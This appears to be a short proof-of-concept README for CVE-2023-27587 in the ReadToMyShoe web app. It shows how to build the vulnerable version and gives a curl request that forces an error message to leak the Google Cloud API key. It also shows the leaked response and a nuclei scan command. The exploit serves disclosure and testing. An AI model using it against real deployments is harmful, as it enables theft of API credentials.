CVE-2023-27587-PoC

The simple PoC of CVE-2023-27587

What is ReadToMyShoe?

ReadtoMyShoe (RTMS) is a web application (rust, yew and axum) that lets you upload articles (via URL or via directly pasting) and listen to them later.

Impact

If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, then it will include the full URL of the request. The request URL contains the Google Cloud API key.

PoC

Setup ReadtoMyShoe vulnerable

$ git clone https://github.com/rozbb/readtomyshoe.git
$ cd readtomyshoe && git checkout v0.2.0
$ echo "GCP_KEY_LEAKED_TEST" > server/gcp_api.key
$ DOCKER_BUILDKIT=1 docker build -t readtomyshoe-vul .
$ docker run -p 9382:9382 readtomyshoe-vul

Exploit

The key is only exposed when an error occurs in the GCP call!

curl 'http://192.168.15.201:9382/api/add-article-by-text' -X POST \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'content-type: application/json' \
  --data-raw '{"title":"Kernsicherheitstest","body":"Kernsicherheitstest"}'

Response error (exposed api key):

TTS failed: TTS request failed

Caused by:
    HTTP status client error (400 Bad Request) for url (https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=GCP_KEY_LEAKED_TEST%0A)

nuclei-template

https://github.com/sec-fx/CVE-2023-27587-PoC/tree/main/nuclei-templates/cves/2023

$ git clone https://github.com/sec-fx/CVE-2023-27587-PoC.git
$ nuclei -t ./CVE-2023-27587-PoC/nuclei-templates/cves/2023/CVE-2023-27587.yaml -u http://<host>

References

https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587